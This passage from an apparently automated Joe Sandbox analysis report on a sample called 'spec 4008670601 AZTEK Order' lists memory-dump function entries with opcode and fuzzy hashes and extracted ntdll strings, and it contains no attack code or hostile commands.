                                                      • Instruction Fuzzy Hash: 02F0E5392043459BDB1ACF19C040A95FFA4FB81360B010498FD428B311DB31E981CB51
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                      • Instruction ID: 5dab6623c24b48b49ca6971a1e1fcf6c9e80c5844c79a22d76a847c3ba70728d
                                                      • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                      • Instruction Fuzzy Hash: 12E0D83224414DABD3311A69C808B66F7B5EBD47A0F160429E242AB958DB70DD40C7D9
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                      • Instruction ID: 50a965ba540220696490113811e65954d01e4cbd62b95831179b8fd5932d7f74
                                                      • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                      • Instruction Fuzzy Hash: 2AE04872640214BBDB2197598D05F9ABEBCDB54F90F154155B601D7194E570DE00D690
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                      • Instruction ID: 7232ce5f25da981b27b84d52455238a1ba558ff73d8779bde687f8d9c9304fd4
                                                      • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                      • Instruction Fuzzy Hash: 2EE09B316403548BCB258A1EC540A73B7E8DF96764F15806DE90987712C231F942C6D0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 946fedfe9f8c99aedb8573479e6e560fc7246f903cc44c9eda984c90e7e47cd1
                                                      • Instruction ID: aa050ca303264c1a9b8761e261f2a733125f2ea15855b35c42e3221fad88701a
                                                      • Opcode Fuzzy Hash: 946fedfe9f8c99aedb8573479e6e560fc7246f903cc44c9eda984c90e7e47cd1
                                                      • Instruction Fuzzy Hash: 91E092321005549BC722BF29DD09F8AB7DAEFA4360F154615F11557195CB70A950C7C8
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                      • Instruction ID: 1d728cfac18e17565dd827c6957ebba4e13a9017a6aad93a64fa147823a974b4
                                                      • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                      • Instruction Fuzzy Hash: 83E09231010612DFE7766F6AC98CB56BEE4FF50711F148D2CE096524B4C7B599C1CA40
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                      • Instruction ID: e06ea9830d410a6221d9ba2e998522d1637f374cf28af23fb2b96377bee58ba6
                                                      • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                      • Instruction Fuzzy Hash: 27E0C2343003158FE756CF1AC040B627BB6BFD5B10F28C069E9498F205EB36E982CB50
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 135bad9fcd6c79a88319240c3948f79db14a44617d0900b2aae56349256c0883
                                                      • Instruction ID: 2a4505677adac8e7a33290899d9f4fa0984d6da115c3e8cdb6dd6823223a1a70
                                                      • Opcode Fuzzy Hash: 135bad9fcd6c79a88319240c3948f79db14a44617d0900b2aae56349256c0883
                                                      • Instruction Fuzzy Hash: 28D02B325D50206ACB37E1187C48FD3BB699B84720F0548A9F20896015D524CD81D6C4
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                      • Instruction ID: 1bb4bdcac4e43494fa7407a55394ece89c47937d59c0bca85f7ac36696606a54
                                                      • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                      • Instruction Fuzzy Hash: C9E0C232448A18EFDF322F25EC08F52F6E5FF59B10F2448AAE081070A987B4AC85CB45
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ebea108ca51ea3b62ef5591ec81876dd8be8d5e576653a94ce4f14eceab11783
                                                      • Instruction ID: 7aed5557f85ba1777f1269874bada073ed6049c3166e08e7d3dc7372485b492b
                                                      • Opcode Fuzzy Hash: ebea108ca51ea3b62ef5591ec81876dd8be8d5e576653a94ce4f14eceab11783
                                                      • Instruction Fuzzy Hash: 27E08C331004506BC212FB5DDD40F8AB39AEFA4360F540221F15187698CB60AD40C794
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                      • Instruction ID: 77b8fc7a6c147e2021991f082656ccead0e8ce0fd2d17d79790db6ab50cb392d
                                                      • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                      • Instruction Fuzzy Hash: 59E08633111A1887C728DE18D511B72B7B4EF85720F09463EE61347780C534F544C796
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                      • Instruction ID: ef5d6f0c316aed914269733cce5ac67fca5d8029ccee880a6fcf430ba09e9e01
                                                      • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                      • Instruction Fuzzy Hash: D9D05E36511A50AFC3329F1BEA04D53FBF9FBC4A107050A2EE54583A24C770E846CBA0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                      • Instruction ID: 221b42aba18a17a0d9d3ae7225adc96f1305e8fc9743f9883184170e43de1768
                                                      • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                      • Instruction Fuzzy Hash: 2FD0A933604620ABD772AA1CFC04FC373E8BB88B20F060859F028C7098C360AC81CA84
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                      • Instruction ID: b244326554d518e630d98b5cd5137e2242f0ed975101812a09cba5c77ef0d539
                                                      • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                      • Instruction Fuzzy Hash: 70E08C329406809BCF13DFA9C644F4AFBB9BB80B00F180044A4089B268C634A900CB40
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                      • Instruction ID: 21676073d7471ab82e7aed028e3218282747178c0e1369c0a256abfe7796561a
                                                      • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                      • Instruction Fuzzy Hash: 20D0223221303193CF2856997844FA3E925EB81A90F1A006C740A93804C1148C82C2E0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                      • Instruction ID: 71b258fc9b9094e211567bd122376632dad8fc028bd2f2947db7a7e3b27dc897
                                                      • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                      • Instruction Fuzzy Hash: F2D012371D054DBBCB119FA6DC41F957BA9E764BA0F444420F514875A0C63AE990D584
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b9716e5a5b14fad8ad864cb63f3c9405bdc78d49fe454cefbe15430927decb5a
                                                      • Instruction ID: c2f7e6b47f14d994c3d4a152ae21ea588a4cd139a1e9d8ff16d080e5f406faa9
                                                      • Opcode Fuzzy Hash: b9716e5a5b14fad8ad864cb63f3c9405bdc78d49fe454cefbe15430927decb5a
                                                      • Instruction Fuzzy Hash: FBD0A731541005CBDF17CF88C551E6EB674FF60740B40006CE70091024E724FE01CA40
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                      • Instruction ID: 82e0d32256a920b3e4a60e205124c75b07efa6875cba199bef9a6659052dfc2c
                                                      • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                      • Instruction Fuzzy Hash: 58C01232290648AFC712AA99CD41F42BBA9EBA8B40F000421F2048B6B0C631E860EA84
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                      • Instruction ID: 7447321bb6778e9e444c0817cc9a5cdf2cc239e4811c6ebb08c69263d02a5c73
                                                      • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                      • Instruction Fuzzy Hash: 15D01236100248EFCB01DF41C890D9AB72AFBD8B10F10801DFD19076108A31ED63DA90
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                      • Instruction ID: fe7c0f0ac1e1145a16aa1c0edc41b64d89218af9c0168b8833d191b63a4ec52a
                                                      • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                      • Instruction Fuzzy Hash: 0AC04C757015418FCF15DF19D6D4F45B7E4F744740F150890E905CB721E724E841CA10
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3625f8d5db97267820d3115a4a9be2ad6785899c92f3cb2304d4c3b07f5f8121
                                                      • Instruction ID: 6644c73e3fa28f8e4cb3bf586e6d65db0a26d17d2824564d2a231a11881101ff
                                                      • Opcode Fuzzy Hash: 3625f8d5db97267820d3115a4a9be2ad6785899c92f3cb2304d4c3b07f5f8121
                                                      • Instruction Fuzzy Hash: 9C900231609800129640725848845478005E7E1301B55C025E1424574CCB14CB6A5362
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 099121dfd00a68608b7b46c81c93abc10576e33c28ad7237d0ce00b6ba6be337
                                                      • Instruction ID: b291931a4e87a40471a9ecc4305c6f728e5fa3e5d4b47de65b12ec76c562859e
                                                      • Opcode Fuzzy Hash: 099121dfd00a68608b7b46c81c93abc10576e33c28ad7237d0ce00b6ba6be337
                                                      • Instruction Fuzzy Hash: 4990026160550042464072584804407A005E7E2301395C129A1554570CC718CA69936A
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 16c7ac90fe1343e57c981dca993781e7d3055943be8d885d31e8a3f18430bedb
                                                      • Instruction ID: 6c44f5c5bf651923b49305e9fb44a8b91baabc4a1739790133fd8edd0fcfc4fd
                                                      • Opcode Fuzzy Hash: 16c7ac90fe1343e57c981dca993781e7d3055943be8d885d31e8a3f18430bedb
                                                      • Instruction Fuzzy Hash: 6190023120540802D6807258440464B4005D7D2301F95C029A1025674DCB15CB6D77A2
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ccd6f5adf7ca02485e813d7b512c777e8cacd0287ba305db04cbba12341fcd32
                                                      • Instruction ID: 7b1ba6754d4c9ee7960e785b3a3a4b0eb73771e98a04e6f7f10f45b0d8ac4b04
                                                      • Opcode Fuzzy Hash: ccd6f5adf7ca02485e813d7b512c777e8cacd0287ba305db04cbba12341fcd32
                                                      • Instruction Fuzzy Hash: 9290023120944842D64072584404A474015D7D1305F55C025A10646B4DD725CF69B762
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 945589cfd30f504241c027f29658d30a075325852dd936988ce3509c489c24b9
                                                      • Instruction ID: 087dd9124830e8a1c4a5d9302d7d1a2d3cc7a6d8bcc504a49d59b6f64a263aca
                                                      • Opcode Fuzzy Hash: 945589cfd30f504241c027f29658d30a075325852dd936988ce3509c489c24b9
                                                      • Instruction Fuzzy Hash: 6C90023160940802D650725844147474005D7D1301F55C025A1024674DC755CB6977A2
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2e61c2a84b38940bfcd98bcf43778a84e57fd024beb8b6e2e567f23edeb32d26
                                                      • Instruction ID: 7fc8a785a75296ba99d360c0638f0dc041f30bd1febf5c0ff1ae08ac83b5e600
                                                      • Opcode Fuzzy Hash: 2e61c2a84b38940bfcd98bcf43778a84e57fd024beb8b6e2e567f23edeb32d26
                                                      • Instruction Fuzzy Hash: 7190023120540802D604725848046874005D7D1301F55C025A7024675ED765CAA57232
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 040d252a758774bd52df40f0d32eac76b18d1022806777b465545bfed7045daa
                                                      • Instruction ID: c832d196e41a9951aaecbaafad7b9651a6469ddb13cf567fc6fd441ca621e374
                                                      • Opcode Fuzzy Hash: 040d252a758774bd52df40f0d32eac76b18d1022806777b465545bfed7045daa
                                                      • Instruction Fuzzy Hash: 9A900225225400020645B658060450B4445E7D7351395C029F24165B0CC721CA795322
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ab7b6d6fe6a6fba33f0d4efdd410da52bb40a89ca3367f0afcf3404e0f3f3e3f
                                                      • Instruction ID: ca2ef29ed05e5a28a9142894a2deb963cefc1c507e1fdef0be8db907a2f877b9
                                                      • Opcode Fuzzy Hash: ab7b6d6fe6a6fba33f0d4efdd410da52bb40a89ca3367f0afcf3404e0f3f3e3f
                                                      • Instruction Fuzzy Hash: 5D900225215400030605B65807045074046D7D6351355C035F2015570CD721CA755222
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e0b8202cf4e6ae777127fe48a59dd766fe47e3ef3ff27b72428769117c83d1c7
                                                      • Instruction ID: 39f898736abb3c8ac36f8f185b0d8b5313997ddfe245d2dd3b24bf2ad4288d22
                                                      • Opcode Fuzzy Hash: e0b8202cf4e6ae777127fe48a59dd766fe47e3ef3ff27b72428769117c83d1c7
                                                      • Instruction Fuzzy Hash: D99002A1205540924A00B3588404B0B8505D7E1201B55C02AE2054570CC625CA659236
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 654a72a869c784e80cb4d76bbc623e257ac8b492cc732e9667e48fa780b7a118
                                                      • Instruction ID: 50a82235597b351e2992b5d30f079a6bc7014ebe88bb28efa8f4beea9e501ba8
                                                      • Opcode Fuzzy Hash: 654a72a869c784e80cb4d76bbc623e257ac8b492cc732e9667e48fa780b7a118
                                                      • Instruction Fuzzy Hash: 5090022130540003D640725854186078005E7E2301F55D025E1414574CDA15CA6A5323
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      Strings
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01814655
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01814742
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01814787
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01814725
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018146FC
                                                      • Execute=1, xrefs: 01814713
                                                      • ExecuteOptions, xrefs: 018146A0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: d9053459f726d969c1ecdd4d86f88cd5993695646784ec9b47f766d00cfd3129
                                                      • Instruction ID: 7b097f368ebb665cb93e43f7e2a5e02edfaeee40870442d8fb6aaa1af2cbc58e
                                                      • Opcode Fuzzy Hash: d9053459f726d969c1ecdd4d86f88cd5993695646784ec9b47f766d00cfd3129
                                                      • Instruction Fuzzy Hash: FE51397164021DBAEF15EBA8DC99FA9B7B8EF18318F1404D9D605E7181E7709B41CF50
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: 5270ccefbae1948bd2d263e772e859e8675d989e5a3d3594791f77230a13a856
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: 2A81D070E852498EEF298E6CC8997FEFFF1AF8D320F18415AD951A7691C7309840CB91
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$[$]:%u
                                                      • API String ID: 48624451-2819853543
                                                      • Opcode ID: 2a93d09bfea64d828be8f8f5ad3e06fae6dc4f61383c16ab4d17b8b138a193c6
                                                      • Instruction ID: 5f8c094f46e201fff233735c4c5095c2ec6402a8c7d989dc82a29ca6ffb1e091
                                                      • Opcode Fuzzy Hash: 2a93d09bfea64d828be8f8f5ad3e06fae6dc4f61383c16ab4d17b8b138a193c6
                                                      • Instruction Fuzzy Hash: 5421567AA00519ABDB50DE79DC449BFBBEAEF54744F040115ED05D3205EB30EA058B91
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 0181031E
